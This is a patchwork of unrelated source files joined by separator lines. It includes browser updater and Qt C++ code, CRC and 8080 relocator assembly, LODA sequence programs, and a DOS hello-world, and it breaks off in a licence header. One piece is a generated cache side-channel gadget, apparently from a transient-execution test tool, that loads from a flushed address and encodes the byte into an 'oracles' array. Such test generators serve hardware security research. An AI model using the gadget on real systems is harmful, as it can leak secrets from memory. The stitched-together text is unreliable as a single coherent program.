BraveConfigurator::BraveConfigurator(
const base::CommandLine* cmdline,
net::URLRequestContextGetter* url_request_getter,
bool use_brave_server)
: configurator_impl_(cmdline, url_request_getter, false),
use_brave_server_(use_brave_server) {}
// Delegates to Chromium's ConfiguratorImpl.
int BraveConfigurator::InitialDelay() const {
return configurator_impl_.InitialDelay();
}
// Delegates to Chromium's ConfiguratorImpl.
int BraveConfigurator::NextCheckDelay() const {
return configurator_impl_.NextCheckDelay();
}
// Delegates to Chromium's ConfiguratorImpl.
int BraveConfigurator::OnDemandDelay() const {
return configurator_impl_.OnDemandDelay();
}
// Delegates to Chromium's ConfiguratorImpl.
int BraveConfigurator::UpdateDelay() const {
return configurator_impl_.UpdateDelay();
}
std::vector<GURL> BraveConfigurator::UpdateUrl() const {
if (use_brave_server_) {
// For localhost of vault-updater
// return std::vector<GURL> {GURL("http://localhost:8192/extensions")};
return std::vector<GURL>
{GURL("https://laptop-updates.brave.com/extensions")};
}
// For Chrome's component store
return configurator_impl_.UpdateUrl();
}
// Pings are sent to the same endpoints as update checks.
std::vector<GURL> BraveConfigurator::PingUrl() const {
  return UpdateUrl();
}
// Product id reported to the backend: left empty.
std::string BraveConfigurator::GetProdId() const {
  return std::string();
}

// Browser version comes from the wrapped ConfiguratorImpl.
base::Version BraveConfigurator::GetBrowserVersion() const {
  return configurator_impl_.GetBrowserVersion();
}

// Channel is hard-coded to "stable" regardless of the actual build channel.
std::string BraveConfigurator::GetChannel() const {
  return std::string("stable");
}

// Brand code: left empty.
std::string BraveConfigurator::GetBrand() const {
  return std::string();
}

// Language: left empty.
std::string BraveConfigurator::GetLang() const {
  return std::string();
}

std::string BraveConfigurator::GetOSLongName() const {
  return configurator_impl_.GetOSLongName();
}

std::string BraveConfigurator::ExtraRequestParams() const {
  return configurator_impl_.ExtraRequestParams();
}

// Download preference: left empty (no cache-friendly download hint).
std::string BraveConfigurator::GetDownloadPreference() const {
  return std::string();
}
// The network request context is supplied by the wrapped ConfiguratorImpl.
net::URLRequestContextGetter* BraveConfigurator::RequestContext() const {
  return configurator_impl_.RequestContext();
}

// No out-of-process patcher is provided; callers receive null.
scoped_refptr<update_client::OutOfProcessPatcher>
BraveConfigurator::CreateOutOfProcessPatcher() const {
  return nullptr;
}
bool BraveConfigurator::EnabledComponentUpdates() const {
  return configurator_impl_.EnabledComponentUpdates();
}

// Delta updates are force-disabled for now.
bool BraveConfigurator::EnabledDeltas() const {
  // TODO(bbondy): Re-enable
  // return configurator_impl_.DeltasEnabled();
  return false;
}

bool BraveConfigurator::EnabledBackgroundDownloader() const {
  return configurator_impl_.EnabledBackgroundDownloader();
}

// CUP signing is skipped when talking to the Brave server, which uses its
// own message-signing scheme (see the comment above the constructor).
bool BraveConfigurator::EnabledCupSigning() const {
  if (use_brave_server_) {
    return false;
  }
  return configurator_impl_.EnabledCupSigning();
}
// No PrefService is wired up for this configurator; callers must handle null.
PrefService* BraveConfigurator::GetPrefService() const {
  return nullptr;
}

// No activity tracking either; callers must handle null.
update_client::ActivityDataService* BraveConfigurator::GetActivityDataService()
    const {
  return nullptr;
}

// Always reported as a system-wide (non per-user) install.
bool BraveConfigurator::IsPerUserInstall() const {
  return false;
}

std::vector<uint8_t> BraveConfigurator::GetRunActionKeyHash() const {
  return configurator_impl_.GetRunActionKeyHash();
}
} // namespace
// Factory helper: builds a ref-counted BraveConfigurator; lifetime is
// managed by the returned scoped_refptr.
scoped_refptr<update_client::Configurator>
MakeBraveComponentUpdaterConfigurator(
    const base::CommandLine* cmdline,
    net::URLRequestContextGetter* context_getter,
    bool use_brave_server) {
  return new BraveConfigurator(cmdline, context_getter, use_brave_server);
}
} // namespace component_updater
|
;;
;; Copyright (c) 2019-2021, Intel Corporation
;;
;; Redistribution and use in source and binary forms, with or without
;; modification, are permitted provided that the following conditions are met:
;;
;; * Redistributions of source code must retain the above copyright notice,
;; this list of conditions and the following disclaimer.
;; * Redistributions in binary form must reproduce the above copyright
;; notice, this list of conditions and the following disclaimer in the
;; documentation and/or other materials provided with the distribution.
;; * Neither the name of Intel Corporation nor the names of its contributors
;; may be used to endorse or promote products derived from this software
;; without specific prior written permission.
;;
;; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
;; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
;; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
;; DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
;; FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
;; DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
;; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
;; CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
;; OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
;; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
;;
%include "include/os.asm"
%include "include/reg_sizes.asm"
%include "include/crc32_refl_const.inc"
%include "include/clear_regs.asm"
%include "include/cet.inc"
%include "include/error.inc"
[bits 64]
default rel

;; The symbol names and the underlying CRC implementation can be overridden
;; at build time (e.g. to assemble AVX/other variants from this same file).
%ifndef ETHERNET_FCS_FN
%define ETHERNET_FCS_FN ethernet_fcs_sse
%endif
%ifndef ETHERNET_FCS_FN_LOCAL
%define ETHERNET_FCS_FN_LOCAL ethernet_fcs_sse_local
%endif
%ifndef CRC32_REFL_FN
%define CRC32_REFL_FN crc32_refl_by8_sse
%endif

;; Map the first four integer argument registers per ABI
;; (System V on Linux, Microsoft x64 otherwise).
%ifdef LINUX
%define arg1 rdi
%define arg2 rsi
%define arg3 rdx
%define arg4 rcx
%endif
%ifndef LINUX
%define arg1 rcx
%define arg2 rdx
%define arg3 r8
%define arg4 r9
%endif

;; Stack frame used to preserve callee-saved state across the CRC call:
;; one GPR slot, the caller's RSP, and 8 XMM registers (16 bytes each).
struc STACK_FRAME
_gpr_save: resq 1
_rsp_save: resq 1
_xmm_save: resq 8 * 2
endstruc
mksection .text
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; arg1 - buffer pointer
;; arg2 - buffer size in bytes
;; Returns CRC value through RAX
;; Computes the Ethernet FCS (reflected CRC32) of a buffer.
;; arg1 - buffer pointer, arg2 - length in bytes; result returned in RAX.
align 32
MKGLOBAL(ETHERNET_FCS_FN, function,)
ETHERNET_FCS_FN:
        endbranch64
%ifdef SAFE_PARAM
        ;; Reset imb_errno
        IMB_ERR_CHECK_RESET
        ;; Check len == 0 (len of zero is valid: CRC of empty buffer)
        or arg2, arg2
        jz end_param_check
        ;; Check in == NULL (invalid if len != 0)
        or arg1, arg1
        jz wrong_param
end_param_check:
%endif
        ;; Align the stack to 16 bytes, keeping the original RSP so it can
        ;; be restored at exit.
        mov rax, rsp
        sub rsp, STACK_FRAME_size
        and rsp, -16
        mov [rsp + _rsp_save], rax
%ifndef LINUX
        ;; Windows x64 ABI: xmm6+ are callee-saved; preserve the ones the
        ;; called CRC routine may use.
        movdqa [rsp + _xmm_save + 16*0], xmm6
        movdqa [rsp + _xmm_save + 16*1], xmm7
        movdqa [rsp + _xmm_save + 16*2], xmm8
        movdqa [rsp + _xmm_save + 16*3], xmm9
        movdqa [rsp + _xmm_save + 16*4], xmm10
        movdqa [rsp + _xmm_save + 16*5], xmm11
        movdqa [rsp + _xmm_save + 16*6], xmm12
        movdqa [rsp + _xmm_save + 16*7], xmm13
%endif
        ;; Call CRC32_REFL_FN(init_crc = 0, buf, len, const_table).
        lea arg4, [rel crc32_ethernet_fcs_const]
        mov arg3, arg2
        mov arg2, arg1
        xor DWORD(arg1), DWORD(arg1)
        call CRC32_REFL_FN
%ifndef LINUX
        movdqa xmm6, [rsp + _xmm_save + 16*0]
        movdqa xmm7, [rsp + _xmm_save + 16*1]
        movdqa xmm8, [rsp + _xmm_save + 16*2]
        movdqa xmm9, [rsp + _xmm_save + 16*3]
        movdqa xmm10, [rsp + _xmm_save + 16*4]
        movdqa xmm11, [rsp + _xmm_save + 16*5]
        movdqa xmm12, [rsp + _xmm_save + 16*6]
        movdqa xmm13, [rsp + _xmm_save + 16*7]
%endif
%ifdef SAFE_DATA
        ;; Wipe scratch XMM registers so no data leaks to the caller.
        clear_scratch_xmms_sse_asm
%endif
        mov rsp, [rsp + _rsp_save]
        ret
%ifdef SAFE_PARAM
wrong_param:
        ;; Clear reg and imb_errno
        IMB_ERR_CHECK_START rax
        ;; Check in != NULL
        IMB_ERR_CHECK_NULL arg1, rax, IMB_ERR_NULL_SRC
        ;; Set imb_errno
        IMB_ERR_CHECK_END rax
        ret
%endif
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; arg1 - buffer pointer
;; arg2 - buffer size in bytes
;; arg3 - place to store computed CRC value (can be NULL)
;; Returns CRC value through RAX
;; Library-internal variant of the Ethernet FCS computation.
;; arg1 - buffer pointer, arg2 - length in bytes,
;; arg3 - optional pointer where the 32-bit CRC is also stored (may be NULL).
;; Result is returned in RAX. No SAFE_PARAM checks or XMM save/restore here.
align 32
MKGLOBAL(ETHERNET_FCS_FN_LOCAL, function,internal)
ETHERNET_FCS_FN_LOCAL:
        ;; Align the stack, saving the caller's RSP and the output pointer.
        mov rax, rsp
        sub rsp, STACK_FRAME_size
        and rsp, -16
        mov [rsp + _rsp_save], rax
        mov [rsp + _gpr_save], arg3
        ;; Call CRC32_REFL_FN(init_crc = 0, buf, len, const_table).
        lea arg4, [rel crc32_ethernet_fcs_const]
        mov arg3, arg2
        mov arg2, arg1
        xor DWORD(arg1), DWORD(arg1)
        call CRC32_REFL_FN
        ;; If an output pointer was supplied, store the 32-bit CRC there too.
        mov arg3, [rsp + _gpr_save]
        or arg3, arg3
        je .local_fn_exit
        mov [arg3], eax
.local_fn_exit:
        mov rsp, [rsp + _rsp_save]
        ret
mksection stack-noexec
|
; A111572: a(n) = a(n-1) + a(n-3) + a(n-4), n >= 4.
; Submitted by Jon Maiga
; -1,3,2,1,3,8,11,15,26,45,71,112,183,299,482,777,1259,2040,3299,5335,8634,13973,22607,36576,59183,95763,154946,250705,405651,656360,1062011,1718367,2780378,4498749,7279127,11777872,19056999,30834875,49891874,80726745
; Input n arrives in $0; the result a(n) ends up in $0 at exit.
; NOTE(review): generated LODA code — registers $1..$5 appear to carry a
; sliding window of previous terms so each loop iteration advances the
; recurrence a(n) = a(n-1) + a(n-3) + a(n-4); confirm against the b-file.
mov $1,1
mov $2,3
mov $4,-1
; Loop n times, counting $0 down to zero.
lpb $0
sub $0,1
sub $3,$4
mov $4,$2
mov $2,$3
add $2,$1
mov $1,$3
add $5,$4
mov $3,$5
lpe
mov $0,$4
|
#include "Precomp.h"
#include "Shader.h"
#include <Core/File.h>
// Default-constructs a shader resource with no type assigned.
Shader::Shader()
    : myType(IShader::Type::Invalid)
{
}
// Constructs a shader resource for the given path. The shader type is
// derived from the path's trailing 4 characters; paths of 4 characters or
// fewer (too short to hold a name plus extension) are left Invalid.
Shader::Shader(Resource::Id anId, const std::string& aPath)
    : Resource(anId, aPath)
    , myType(IShader::Type::Invalid)
{
    if (aPath.length() > 4)
    {
        myType = DetermineType(aPath);
    }
}
// Caches the raw file contents for later compilation/upload.
void Shader::OnLoad(const File& aFile)
{
    // TODO: add a similar to .ppl file that contains paths to correct
    // shader files (GLSL/SPIR-V)
    // TODO: this does a copy - add a move from function to File
    // with safety-use asserts, or figure out alternative approach
    myFileContents = aFile.GetBuffer();
}
// Maps a shader file path to its IShader::Type based on the path's last
// 4 characters ("vert", "frag", "tctr", "tevl" or "geom").
// Returns IShader::Type::Invalid (after asserting) for unrecognized
// extensions or paths too short to carry one.
IShader::Type Shader::DetermineType(const std::string& aPath)
{
    // Guard against paths shorter than the 4-character extension: without
    // this, substr(aPath.length() - 4) underflows and throws
    // std::out_of_range (only one caller currently pre-checks the length).
    if (aPath.length() < 4)
    {
        ASSERT_STR(false, "Type not supported!");
        return IShader::Type::Invalid;
    }
    const std::string ext = aPath.substr(aPath.length() - 4);
    if (ext == "vert")
    {
        return IShader::Type::Vertex;
    }
    else if (ext == "frag")
    {
        return IShader::Type::Fragment;
    }
    else if (ext == "tctr")
    {
        return IShader::Type::TessControl;
    }
    else if (ext == "tevl")
    {
        return IShader::Type::TessEval;
    }
    else if (ext == "geom")
    {
        return IShader::Type::Geometry;
    }
    else
    {
        ASSERT_STR(false, "Type not supported!");
        return IShader::Type::Invalid;
    }
}
; A200039: Number of -n..n arrays x(0..2) of 3 elements with sum zero and with zeroth through 2nd differences all nonzero.
; 0,2,14,28,52,78,114,152,200,250,310,372,444,518,602,688,784,882,990,1100,1220,1342,1474,1608,1752,1898,2054,2212,2380,2550,2730,2912,3104,3298,3502,3708,3924,4142,4370,4600,4840,5082,5334,5588,5852,6118,6394
; Straight-line evaluation of A200039 for the input in $0.
; NOTE(review): generated LODA code — the final value is left in $1 (this
; program's output register); register roles are not otherwise documented,
; verify against the sequence data above.
mov $4,$0
add $0,3
pow $4,2
add $0,$4
mov $3,-20
sub $3,$0
; $4 rounded down to an even value.
div $4,2
mul $4,2
mov $2,$4
mul $2,2
mov $1,$2
mul $1,2
mul $3,2
sub $1,$3
sub $1,43
div $1,4
mul $1,2
|
#include <QNetworkAccessManager>
#include <QNetworkRequest>
#include <QNetworkReply>
#include <QDebug>
#include "AuthFlow.h"
#include <Application.h>
// Forwards construction to AccountTask; m_steps is presumably populated
// elsewhere (e.g. by subclasses) before the task executes — see nextStep().
AuthFlow::AuthFlow(AccountData * data, QObject *parent) :
    AccountTask(data, parent)
{
}
// Marks the account valid and transitions the task to the succeeded state.
void AuthFlow::succeed() {
    m_data->validity_ = AccountValidity::Valid;
    changeState(
        AccountTaskState::STATE_SUCCEEDED,
        tr("Finished all authentication steps")
    );
}
// Task entry point. A no-op if a step is already in flight (re-entry
// guard); otherwise moves to the working state and starts the first step.
void AuthFlow::executeTask() {
    if(m_currentStep) {
        return;
    }
    changeState(AccountTaskState::STATE_WORKING, tr("Initializing"));
    nextStep();
}
// Pops the next step off the queue and starts it. When the queue is empty,
// every step completed without an incident, so the flow succeeds.
void AuthFlow::nextStep() {
    if(m_steps.size() == 0) {
        // we got to the end without an incident... assume this is all.
        m_currentStep.reset();
        succeed();
        return;
    }
    m_currentStep = m_steps.front();
    qDebug() << "AuthFlow:" << m_currentStep->describe();
    m_steps.pop_front();
    // Wire the step's signals through to this flow before starting it.
    connect(m_currentStep.get(), &AuthStep::finished, this, &AuthFlow::stepFinished);
    connect(m_currentStep.get(), &AuthStep::showVerificationUriAndCode, this, &AuthFlow::showVerificationUriAndCode);
    connect(m_currentStep.get(), &AuthStep::hideVerificationUriAndCode, this, &AuthFlow::hideVerificationUriAndCode);
    m_currentStep->perform();
}
// Human-readable description of the task's current state. While a step is
// actively running we surface that step's own description; in every other
// state we defer to the base class message.
QString AuthFlow::getStateMessage() const {
    if (m_taskState != AccountTaskState::STATE_WORKING) {
        return AccountTask::getStateMessage();
    }
    return m_currentStep ? m_currentStep->describe() : tr("Working...");
}
// Slot invoked when the current step signals completion. If changeState()
// accepts the new state (i.e. the flow may continue), run the next step.
void AuthFlow::stepFinished(AccountTaskState resultingState, QString message) {
    if(changeState(resultingState, message)) {
        nextStep();
    }
}
|
; A051437: Number of undirected walks of length n+1 on an oriented triangle, visiting n+2 vertices, with n "corners"; the symmetry group is C3. Walks are not self-avoiding.
; 1,3,4,10,16,36,64,136,256,528,1024,2080,4096,8256,16384,32896,65536,131328,262144,524800,1048576,2098176,4194304,8390656,16777216,33558528,67108864,134225920,268435456,536887296,1073741824,2147516416,4294967296,8590000128,17179869184,34359869440,68719476736,137439215616,274877906944,549756338176,1099511627776,2199024304128,4398046511104,8796095119360,17592186044416,35184376283136,70368744177664,140737496743936,281474976710656,562949970198528,1125899906842624,2251799847239680,4503599627370496
; Computes A051437 for the input in $0; the result ends up in $0.
; NOTE(review): generated LODA code — the two-pass loop evaluates the
; referenced sequence A056309 (via `seq`) at neighboring indices and
; combines the results; register roles inferred, verify against the data.
mov $2,$0
mov $4,2
lpb $4
mov $0,$2
sub $4,1
add $0,$4
max $0,0
seq $0,56309 ; Number of reversible strings with n beads using exactly two different colors.
mov $3,$0
mov $5,$4
mul $5,$0
add $1,$5
lpe
min $2,1
mul $2,$3
sub $1,$2
mov $0,$1
|
; DDT RELOCATOR PROGRAM, INCLUDED WITH THE MODULE TO PERFORM
; THE MOVE FROM 200H TO THE DESTINATION ADDRESS
;
; Overall flow: print the sign-on banner, copy the module from 200H to the
; page just below BDOS, then walk a relocation bit map (one bit per byte of
; the module; a 1 bit means "add the relocation bias to this byte") and
; finally jump to the relocated program.
VERSION EQU 14 ;1.4
;
; COPYRIGHT (C) 1976, 1977, 1978
; DIGITAL RESEARCH
; BOX 579 PACIFIC GROVE
; CALIFORNIA 93950
;
ORG 100H
STACK EQU 200H
BDOS EQU 0005H
PRNT EQU 9 ;BDOS PRINT FUNCTION
MODULE EQU 200H ;MODULE ADDRESS
;
LXI B,0 ;ADDRESS FIELD FILLED-IN WHEN MODULE BUILT
JMP START
DB 'COPYRIGHT (C) 1978, DIGITAL RESEARCH '
SIGNON: DB 'DDT VERS '
DB VERSION/10+'0','.'
DB VERSION MOD 10 + '0','$'
START: LXI SP,STACK
PUSH B
PUSH B
LXI D,SIGNON
MVI C,PRNT
CALL BDOS
POP B ;RECOVER LENGTH OF MOVE
LXI H,BDOS+2;ADDRESS FIELD OF JUMP TO BDOS (TOP MEMORY)
MOV A,M ;A HAS HIGH ORDER ADDRESS OF MEMORY TOP
DCR A ;PAGE DIRECTLY BELOW BDOS
SUB B ;A HAS HIGH ORDER ADDRESS OF RELOC AREA
MOV D,A
MVI E,0 ;D,E ADDRESSES BASE OF RELOC AREA
PUSH D ;SAVE FOR RELOCATION BELOW
;
; COPY LOOP: MOVE BC BYTES FROM MODULE (HL) TO RELOC AREA (DE)
LXI H,MODULE;READY FOR THE MOVE
MOVE: MOV A,B ;BC=0?
ORA C
JZ RELOC
DCX B ;COUNT MODULE SIZE DOWN TO ZERO
MOV A,M ;GET NEXT ABSOLUTE LOCATION
STAX D ;PLACE IT INTO THE RELOC AREA
INX D
INX H
JMP MOVE
;
RELOC: ;STORAGE MOVED, READY FOR RELOCATION
; HL ADDRESSES BEGINNING OF THE BIT MAP FOR RELOCATION
POP D ;RECALL BASE OF RELOCATION AREA
POP B ;RECALL MODULE LENGTH
PUSH H ;SAVE BIT MAP BASE IN STACK
MOV H,D ;RELOCATION BIAS IS IN D
;
REL0: MOV A,B ;BC=0?
ORA C
JZ ENDREL
;
; NOT END OF THE RELOCATION, MAY BE INTO NEXT BYTE OF BIT MAP
DCX B ;COUNT LENGTH DOWN
MOV A,E
ANI 111B ;0 CAUSES FETCH OF NEXT BYTE
JNZ REL1
; FETCH BIT MAP FROM STACKED ADDRESS
XTHL
MOV A,M ;NEXT 8 BITS OF MAP
INX H
XTHL ;BASE ADDRESS GOES BACK TO STACK
MOV L,A ;L HOLDS THE MAP AS WE PROCESS 8 LOCATIONS
REL1: MOV A,L
RAL ;CY SET TO 1 IF RELOCATION NECESSARY
MOV L,A ;BACK TO L FOR NEXT TIME AROUND
JNC REL2 ;SKIP RELOCATION IF CY=0
;
; CURRENT ADDRESS REQUIRES RELOCATION
LDAX D
ADD H ;APPLY BIAS IN H
STAX D
REL2: INX D ;TO NEXT ADDRESS
JMP REL0 ;FOR ANOTHER BYTE TO RELOCATE
;
ENDREL: ;END OF RELOCATION
POP D ;CLEAR STACKED ADDRESS
MVI L,0
PCHL ;GO TO RELOCATED PROGRAM (H=BIAS PAGE, L=0)
END
|
// Generated buffer-preparation routine (see the metadata comment at the end
// of this file): performs a fixed sequence of stores, loads and rep-movsb
// copies across the *_ht regions — presumably to put them into a known
// cache state before the faulty-load experiment. All GPRs it touches are
// saved and restored; the interleaved nops/flag-ops are generated padding.
.global s_prepare_buffers
s_prepare_buffers:
push %r14
push %r15
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
// Store dword to addresses_WT_ht
lea addresses_WT_ht+0x1a9c6, %r14
nop
nop
inc %rax
movl $0x61626364, (%r14)
cmp %rdx, %rdx
// Load word from addresses_normal_ht
lea addresses_normal_ht+0x1b77e, %r15
nop
nop
xor $18023, %rdx
mov (%r15), %cx
nop
nop
lfence
// Store dword to addresses_A_ht
lea addresses_A_ht+0x95c6, %r14
nop
nop
nop
nop
inc %r9
movl $0x61626364, (%r14)
nop
nop
nop
nop
dec %r14
// rep-movsb copy: addresses_A_ht -> addresses_D_ht (48 bytes)
lea addresses_A_ht+0xe30e, %rsi
lea addresses_D_ht+0x10006, %rdi
nop
and $45980, %r15
mov $48, %rcx
rep movsb
nop
nop
nop
and %rdx, %rdx
// Store byte to addresses_UC_ht
lea addresses_UC_ht+0x1c33e, %rcx
nop
nop
nop
nop
add $14526, %rax
movb $0x61, (%rcx)
nop
nop
xor $8585, %rax
// rep-movsb copy within addresses_A_ht (83 bytes)
lea addresses_A_ht+0x1b5e6, %rsi
lea addresses_A_ht+0x67c6, %rdi
nop
nop
nop
nop
nop
sub %r9, %r9
mov $83, %rcx
rep movsb
nop
xor $64616, %rax
// Flush then store qword to addresses_A_ht
lea addresses_A_ht+0x14216, %r14
clflush (%r14)
cmp %r9, %r9
mov $0x6162636465666768, %rdi
movq %rdi, (%r14)
nop
nop
nop
nop
nop
and %r9, %r9
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r9
pop %r15
pop %r14
ret
// Generated faulty-load experiment: stores a 16-byte pattern to an
// addresses_A location, then performs a load from a flushed, non-canonical
// looking address in %r13 (the "faulty load") and uses the loaded value to
// index the `oracles` array — a cache side-channel transmission gadget
// (NOTE(review): generated code; semantics inferred from the trailing
// metadata comment).
.global s_faulty_load
s_faulty_load:
push %r13
push %rax
push %rbp
push %rbx
push %rdi
push %rsi
// Store
lea addresses_A+0xdd86, %rsi
add $27436, %rdi
mov $0x5152535455565758, %rbp
movq %rbp, %xmm3
movups %xmm3, (%rsi)
nop
nop
nop
nop
nop
inc %rax
// Faulty Load
mov $0x7af38900000007c6, %r13
clflush (%r13)
nop
nop
nop
nop
cmp %rbp, %rbp
mov (%r13), %rbx
// Encode the loaded byte into the oracle array (cache side channel).
lea oracles, %rbp
and $0xff, %rbx
shlq $12, %rbx
mov (%rbp,%rbx,1), %rbx
pop %rsi
pop %rdi
pop %rbx
pop %rbp
pop %rax
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_NC', 'AVXalign': False, 'congruent': 0, 'size': 8, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A', 'AVXalign': False, 'congruent': 5, 'size': 16, 'same': False, 'NT': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_NC', 'AVXalign': False, 'congruent': 0, 'size': 8, 'same': True, 'NT': False}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'congruent': 8, 'size': 4, 'same': False, 'NT': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_normal_ht', 'AVXalign': True, 'congruent': 3, 'size': 2, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 9, 'size': 4, 'same': True, 'NT': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'AVXalign': False, 'congruent': 3, 'size': 1, 'same': True, 'NT': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 5, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 11, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'AVXalign': True, 'congruent': 4, 'size': 8, 'same': False, 'NT': False}}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
; DOS real-mode "Hello world" (MASM): prints the $-terminated message via
; INT 21h function 09h, then exits via function 4Ch.
.model small
.stack 100h
.data
message db "Hello world!$"
.code
main:
mov ax, @data ; point DS at the data segment
mov ds, ax
mov ah, 09h ; DOS: print string at DS:DX up to '$'
lea dx, message
int 21h
return:
mov ah, 4ch ; DOS: terminate process
int 21h
end main
|
/*
* All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
* its licensors.
*
* For complete copyright and license terms please see the LICENSE at the root of this
* distribution (the "License"). All use of this software is governed by the License,
